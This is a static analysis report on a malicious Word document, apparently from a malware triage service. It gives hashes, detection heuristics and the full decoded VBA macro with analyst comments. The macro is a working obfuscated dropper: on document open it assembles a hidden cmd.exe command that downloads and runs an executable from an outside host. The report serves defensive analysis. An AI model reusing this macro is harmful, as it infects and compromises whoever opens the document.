Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a39c4644498a47f8…

MALICIOUS

Office (OLE)

41.0 KB · Created: 2017-03-14 06:37:00 · Authoring application: Microsoft Office Word · First seen: 2017-03-27
MD5: dd1a73ea9ada094b31bc6b26aab8f96c SHA-1: 2a65902ee6baa22b77e1f199e8618ff1636b0404 SHA-256: a39c4644498a47f8858f91a340c6b07eec22ef000a70dcafd1a25600321dbc64
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 — Visual Basic; T1059.003 — Windows Command Shell

The file contains VBA macros, including a Document_Open macro, which is a common technique for initial execution. Heuristics flag a suspicious cmd.exe invocation and a potential Shell call within the VBA code. The Document_Open macro builds a command string at runtime and executes it through Shell via cmd.exe, strongly suggesting it is designed to download and run a secondary payload.

Heuristics 8

  • ClamAV: Doc.Macro.Obfuscation-6394109-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6394109-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    ogdurr = Join(yhynt, "")
    Shell ogdurr, vqamexwa
    End If
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    izesz2 = Array(NaN, "jqkrac( 2) + ""\\\\\\\\"" + aqoj")
    zudra6 = Array(NaN, "cmd.exe /c ""ECh^o^ new Functio")
    vefify5 = Array(NaN, "aqojqkrac ysaosyxusu = ""hosyxo")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub Document_Open()
    Dim pycvadhazf
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — a standard Office markup namespace identifier, not a download location.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6618 bytes
SHA-256: 516098b9b831c91001ad0ef2f565187ceef1d4f14701d6124454a5bdb1eda4b3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
' Module header as decoded from the VBA stream by oletools.olevba: these
' Attribute lines are exporter metadata for the ThisDocument module, not
' executable statements. Note there is no Option Explicit, so any name used
' below without a Dim (e.g. yhynt, ogdurr, NaN) is an implicit Variant.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst annotation (defensive). Document_Open is the Word auto-run event
' handler, so this procedure executes when the document is opened — the
' initial-execution technique the report maps to T1059.005 / T1059.003.
' The comments below only describe what the visible statements do.
Sub Document_Open()
' Every variable declared here later receives a two-element
' Array(NaN, "<fragment>"). Only element (1), the string fragment, is ever
' read (see the yhynt assignment near the end). "NaN" is not a VBA literal;
' with no Option Explicit it is presumably an undeclared, Empty Variant used
' as a throwaway element 0.
Dim pycvadhazf
Dim tulhahcycp4
Dim ysuxor
Dim exuz
Dim unsado3, vefify5, cijapme, urydpuhfa
Dim whihzemzygt9
Dim svyqol, golax, owcavr0, ihzolc5, ozumt0, mujnimn, rulpe3, yvkyran
Dim ihecabp, omujva1, yqidhy, vroxysgac, vqamexwa, ipumc0
Dim izesz2, qumxufo8, yhtuzzetj, foxub, nqined, akkokdegs, yruztisl0
Dim qgavir3
Dim nnupu4
Dim aluck
Dim yjlopf, plemonris6, tecujja, czyke, orimunma, nepobpo5, yhyrxar0, xpulowowk, vvomby5, dqoduzk6, bifemnenh5
Dim petiquh, ifyki7, zudra6, amvupzatv0, safysvo, fwebejx6, ultuvcad, ojewny7, jmadcasb, tukolasd9, ktemma
Dim nsugoji0
Dim jetohecp
Dim qgiztexc7
Dim vumazysv6
Dim shizybryr7, uszinyzxa8, iktivevw6, obicg1, vekpiwrapq6, unitxord
Dim ujzasju8
Dim yzgerydha0
Dim ozed
Dim embykihko, gaxzaqe5, cagid4, adwade9, epotky1, azqenv, yjyrwikh, elytn
Dim ibcec
Dim evoxn1
' Command-line fragments, stored out of order. The fragment text is itself
' obfuscated: recurring substitution tokens (e.g. "aqojq", "osyx", "yrufjy",
' "febkuxj") appear to be undone by the .replace(/.../g, ...) calls visible in
' other fragments, so no single fragment is meaningful alone. The heuristics
' OLE_VBA_CMD / SC_STR_CMD matched the "cmd.exe /c" piece in zudra6 and the
' caret-split "ECh^o^" / "cS^CrI^PT.^EXE" pieces (zudra6, adwade9).
dqoduzk6 = Array(NaN, "ypaqojq = 1;ycnuqymqiosyxaqojq")
amvupzatv0 = Array(NaN, "ojqyrufjyysosyxaqojqmObjaqojqc")
izesz2 = Array(NaN, "jqkrac( 2) + ""\\\\\\\\"" + aqoj")
zudra6 = Array(NaN, "cmd.exe /c ""ECh^o^ new Functio")
vefify5 = Array(NaN, "aqojqkrac ysaosyxusu = ""hosyxo")
akkokdegs = Array(NaN, "qiosyxaqojqkrac.Raqojqsponsaqo")
xpulowowk = Array(NaN, "kracun(ijaqyxosyxaqojqkraca, 0")
omujva1 = Array(NaN, "osyxaqojqkracabpubo);ynolaosyx")
nepobpo5 = Array(NaN, "laosyxaqojqkrac jkiklumyxi = """)
urydpuhfa = Array(NaN, "rufjyosyxosyxaqojqkracaqojqam""")
qgavir3 = Array(NaN, "ycosyxaqojqkraciposyxing.Filaq")
rulpe3 = Array(NaN, "qojqkrac ycnuqymqiosyxaqojqkra")
' WindowStyle argument for the Shell call at the end of the procedure
' (0 = vbHide: the child process is started without a visible window).
vqamexwa = 0
unsado3 = Array(NaN, "jq(""C"");if(osyxypaqojqof ppyxo")
tulhahcycp4 = Array(NaN, " ""cmd.aqojqxaqojq /c "" + osyxm")
ultuvcad = Array(NaN, "dulybz = naqojqw febkuxjcosyxi")
pycvadhazf = Array(NaN, "FilaqojqyrufjyysosyxaqojqmObja")
vroxysgac = Array(NaN, "syxaqojqkraciosyxaqojq(ycnuqym")
bifemnenh5 = Array(NaN, "om/zzz.aqojqxaqojq"";ynolaosyxa")
unitxord = Array(NaN, "qojqXObjaqojqcosyx (axosypx);y")
vumazysv6 = Array(NaN, "_paosyxh);caqojqynoloosyxbuf.C")
fwebejx6 = Array(NaN, "ojqkracabpubo = ""febkuxjDODB.y")
yjyrwikh = Array(NaN, ");aqojqbzudulybz.daqojqlaqojqo")
ujzasju8 = Array(NaN, "aqojqkraciposyx.yrufjyhaqojqll")
evoxn1 = Array(NaN, "yrufjycosyxaqojqkraciposyxing.")
ihecabp = Array(NaN, "ojqn(""GET"", ysaosyxusu, 0);caq")
embykihko = Array(NaN, "ng"") {ynolaosyxaqojqkrac axosy")
epotky1 = Array(NaN, "qojqkraciposyx.yrufjycosyxaqoj")
orimunma = Array(NaN, "ufjypaqojqcialFoldaqojqosyxaqo")
yhyrxar0 = Array(NaN, "amaqojq();caqojqynoloosyxbuf.T")
yruztisl0 = Array(NaN, "krac.saqojqnd();ynolaosyxaqojq")
qumxufo8 = Array(NaN, ";ynolaosyxaqojqkrac caqojqynol")
mujnimn = Array(NaN, "osyxakibja = aqojqbzudulybz.ga")
nsugoji0 = Array(NaN, "ace(/yrufjy/g, ""S"").replace(/r")
yvkyran = Array(NaN, "laosyxaqojqkrac osyxmp_paosyxh")
nnupu4 = Array(NaN, "p_paosyxh;caqojqynoloosyxbuf.P")
yjlopf = Array(NaN, "px = ""MyrufjyXML2.XMLHTTP"";yno")
iktivevw6 = Array(NaN, ".replace(/febkuxj/g, ""A"").repl")
shizybryr7 = Array(NaN, "osiosyxion = 0;if (ycnuqymqios")
golax = Array(NaN, ")('ynolaosyxaqojqkrac aqojqbzu")
gaxzaqe5 = Array(NaN, ", ""t"").replace(/ynol/g, ""v"").r")
ihzolc5 = Array(NaN, "== 200) {caqojqynoloosyxbuf.Wo")
vvomby5 = Array(NaN, "aqojqXObjaqojqcosyx (jkiklumyx")
ifyki7 = Array(NaN, "syxaqojqFilaqojq(Wyrufjycosyxa")
owcavr0 = Array(NaN, "n ('dezhy', 'var dezhy = dezhy")
safysvo = Array(NaN, "qojqcosyx"";ynolaosyxaqojqkrac ")
cijapme = Array(NaN, "qkraciposyxFullNamaqojq);}}');")
petiquh = Array(NaN, "osyx"");ynolaosyxaqojqkrac ppyx")
yqidhy = Array(NaN, "yxaqojqkrac.yrufjyosyxaosyxus ")
jmadcasb = Array(NaN, "krac pibicyfpy = naqojqw febku")
aluck = Array(NaN, "/tekrac/g, ""r""); eval(dezhy);'")
svyqol = Array(NaN, "xjcosyxiynolaqojqXObjaqojqcosy")
czyke = Array(NaN, "c = naqojqw febkuxjcosyxiynola")
ibcec = Array(NaN, "eplace(/aqojq/g, ""e"").replace(")
vekpiwrapq6 = Array(NaN, "syxakibja.Filaqojqyrufjyysosyx")
qgiztexc7 = Array(NaN, "xukryh/g, "":"").replace(/osyx/g")
adwade9 = Array(NaN, ">IBezZ.jse&cS^CrI^PT.^EXE ^/^/")
plemonris6 = Array(NaN, """;ynolaosyxaqojqkrac shuosyxaq")
whihzemzygt9 = Array(NaN, "fjyaynolaqojqToFilaqojq(osyxmp")
uszinyzxa8 = Array(NaN, "qbzudulybz.GaqojqosyxTaqojqmpN")
ozumt0 = Array(NaN, "losaqojq();pibicyfpy.osyxaqojq")
tukolasd9 = Array(NaN, "b iBezz.jse""")
ojewny7 = Array(NaN, "qojqosyxDosyxaqojqkraciynolaqo")
elytn = Array(NaN, "xiynolaqojqXObjaqojqcosyx (shu")
yhtuzzetj = Array(NaN, " = aqojqbzudulybz.Gaqojqosyxyr")
ipumc0 = Array(NaN, "x (imlyxaqojqynol);ynolaosyxaq")
jetohecp = Array(NaN, "i);ycnuqymqiosyxaqojqkrac.opaq")
exuz = Array(NaN, "syxprxukryh//www.gdyhousingsaq")
cagid4 = Array(NaN, "nolaosyxaqojqkrac aqojqbzuduly")
foxub = Array(NaN, "aqojqm == ""sosyxosyxaqojqkraci")
ysuxor = Array(NaN, "ojqosyxaqojqkracynolicaqojqs.c")
tecujja = Array(NaN, "ynolaqojqXObjaqojqcosyx(""yrufj")
nqined = Array(NaN, "oosyxbuf = naqojqw febkuxjcosy")
ktemma = Array(NaN, "bz = naqojqw febkuxjcosyxiynol")
obicg1 = Array(NaN, "imlyxaqojqynol = ""Wyrufjycosyx")
azqenv = Array(NaN, "jqBody);caqojqynoloosyxbuf.yru")
yzgerydha0 = Array(NaN, "ojqynoloosyxbuf.Opaqojqn();yno")
ozed = Array(NaN, "ojqkrac ijaqyxosyxaqojqkraca =")

' NOTE(review): the Shell call is gated on Application.SpecialMode = 0; the
' meaning of that property is not established by this listing, so confirm
' before treating the gate as an environment/sandbox check.
If Application.SpecialMode = 0 Then
' Reassembly. Fragments are picked in an explicit order that differs from the
' declaration order above; zudra6 ("cmd.exe /c ...") comes first, so the joined
' string starts with the command-interpreter invocation. yhynt is never
' declared (implicit Variant — no Option Explicit).
yhynt = Array(zudra6(1), owcavr0(1), iktivevw6(1), nsugoji0(1), qgiztexc7(1), gaxzaqe5(1), ibcec(1), aluck(1), golax(1), ultuvcad(1), tecujja(1), qgavir3(1), amvupzatv0(1), petiquh(1), mujnimn(1), ojewny7(1), unsado3(1), vekpiwrapq6(1), foxub(1), embykihko(1), yjlopf(1), nepobpo5(1), evoxn1(1), pycvadhazf(1), safysvo(1), obicg1(1), ujzasju8(1), plemonris6(1), fwebejx6(1), urydpuhfa(1), qumxufo8(1), nqined(1), elytn(1), omujva1(1), vefify5(1), exuz(1) _
, ysuxor(1), bifemnenh5(1), rulpe3(1), czyke(1), unitxord(1), cagid4(1), ktemma(1), vvomby5(1), jetohecp(1), ihecabp(1), yzgerydha0(1), yvkyran(1), yhtuzzetj(1), orimunma(1), izesz2(1), uszinyzxa8(1), yhyrxar0(1), dqoduzk6(1), yruztisl0(1), jmadcasb(1), svyqol(1), ipumc0(1), ozed(1), tulhahcycp4(1), nnupu4(1), shizybryr7(1), yqidhy(1), ihzolc5(1), vroxysgac(1), akkokdegs(1), azqenv(1), whihzemzygt9(1), vumazysv6(1), ozumt0(1), xpulowowk(1), yjyrwikh(1) _
, ifyki7(1), epotky1(1), cijapme(1), adwade9(1), tukolasd9(1))

' Join with an empty separator yields the complete command line (ogdurr is
' likewise undeclared).
ogdurr = Join(yhynt, "")
' Execution: the assembled command line is handed to Shell with the hidden
' window style, i.e. cmd.exe is spawned by the Word process. Detection note:
' the behavioural signal is the Office process spawning cmd.exe and, per the
' adwade9/tukolasd9 fragments, a script host on a .jse file; reconstruct the
' joined string in an isolated analysis environment rather than by opening
' the document.
Shell ogdurr, vqamexwa
End If
End Sub